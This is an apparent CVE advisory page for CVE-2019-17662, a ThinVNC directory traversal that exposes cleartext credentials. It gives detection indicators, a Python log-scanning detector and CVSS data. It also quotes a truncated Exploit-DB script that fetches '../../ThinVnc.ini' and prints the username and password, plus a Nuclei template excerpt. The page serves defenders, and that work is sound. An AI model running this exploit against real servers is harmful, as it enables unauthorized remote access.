CVE-2019-17662
Published 2019-10-16
Priority P182 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 96.76% (99.9th percentile)
ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cybelsoft | thinvnc | — | — |
Detection & IOCs (extracted from sources)
- HTTP response body contains both 'User=' and 'Password=' strings, indicating successful ThinVnc.ini file read via directory traversal.
- HTTP response Content-Type header contains 'application/binary' when ThinVnc.ini is successfully retrieved.
- HTTP GET request to a path containing '../../ThinVnc.ini' is the canonical exploit pattern for this CVE; monitor web server logs for this traversal sequence.
- The vulnerability is exploitable even when authentication is enabled; unauthenticated HTTP GET requests to the traversal path should be alerted on regardless of auth state.
- The vulnerability affects ThinVNC 1.0b1 and prior, including the 'ThinVNC_Latest' build dated 2018-12-07; scope detection rules accordingly.
- Credentials (username and password) are stored in cleartext inside ThinVnc.ini; if the file is read, full authentication bypass is achieved without any further exploitation.
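The request-side and response-side indicators listed above, as an added detection example (not from the original page or from any of the tools it cites). It assumes a Common Log Format access log and uses hypothetical function names; it also normalises percent-encoding, backslashes and case, which goes beyond the literal pattern given on the page.

```python
import re
from urllib.parse import unquote

# Assumption: Common Log Format access log; adjust the regex to your server.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize_target(target, max_rounds=3):
    """Drop the query string, percent-decode (bounded), unify slashes, lowercase."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()

def is_ini_traversal(target):
    """True when the path has a '..' segment and its last segment is ThinVnc.ini."""
    segments = normalize_target(target).split("/")
    return ".." in segments and segments[-1] == "thinvnc.ini"

def response_leaks_config(content_type, body):
    """Response-side indicators: both keys in the body and a binary content type."""
    return ("User=" in body and "Password=" in body
            and "application/binary" in content_type.lower())

def scan(lines):
    """Return (source, target, status) for each GET matching the traversal pattern."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and m["method"] == "GET" and is_ini_traversal(m["target"]):
            hits.append((m["src"], m["target"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Oct/2019:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Oct/2019:10:00:05 +0000] "GET /xyz/../../ThinVnc.ini HTTP/1.1" 200 214',
    '198.51.100.7 - - [17/Oct/2019:10:00:09 +0000] "GET /xyz/%2e%2e/%2e%2e/thinvnc.INI HTTP/1.1" 404 0',
    '192.0.2.10 - - [17/Oct/2019:10:00:12 +0000] "GET /docs/ThinVnc.ini.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for src, target, status in scan(SAMPLE_LOG):
        print(f"ALERT src={src} status={status} target={target}")
```

A hit logged with status 200 is the case to triage first, since the credentials in ThinVnc.ini should then be treated as exposed.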
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
No detection rules found.
Exploit-DB
ThinVNC 1.0b1 - Authentication Bypass
exploitdb · 2019-10-17 · CVSS 9.8
---
```python
# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
# Date: 2019-10-17
# Exploit Author: Nikhith Tumamlapalli
# Contributor WarMarX
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
# Version: 1.0b1
# Tested on: Windows All Platforms
# CVE : CVE-2019-17662
# Description:
# Authentication Bypass via Arbitrary File Read
#!/usr/bin/python3
import sys
import os
import requests

def exploit(host,port):
    url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
    r = requests.get(url)
    body = r.text
    print(body.splitlines()[2])
    print(body.splitlines()[3])

def main():
    if(len(sys.argv)!=3):
        print("Usage:\n{} \n".format(sys.argv[0]))
        prin
```
Metasploit
ThinVNC Directory Traversal
metasploit
This module exploits a directory traversal vulnerability in ThinVNC versions 1.0b1 and prior, which allows unauthenticated users to retrieve arbitrary files, including the ThinVNC configuration file. This module has been tested successfully on ThinVNC versions 1.0b1 and "ThinVNC_Latest" (2018-12-07).
Nuclei
ThinVNC 1.0b1 - Authentication Bypass
nuclei · CVSS 9.8
Template:
```yaml
id: CVE-2019-17662

info:
  name: ThinVNC 1.0b1 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be r
```
References
- http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
- https://github.com/bewest/thinvnc/issues/5
- https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
- https://redteamzone.com/ThinVNC/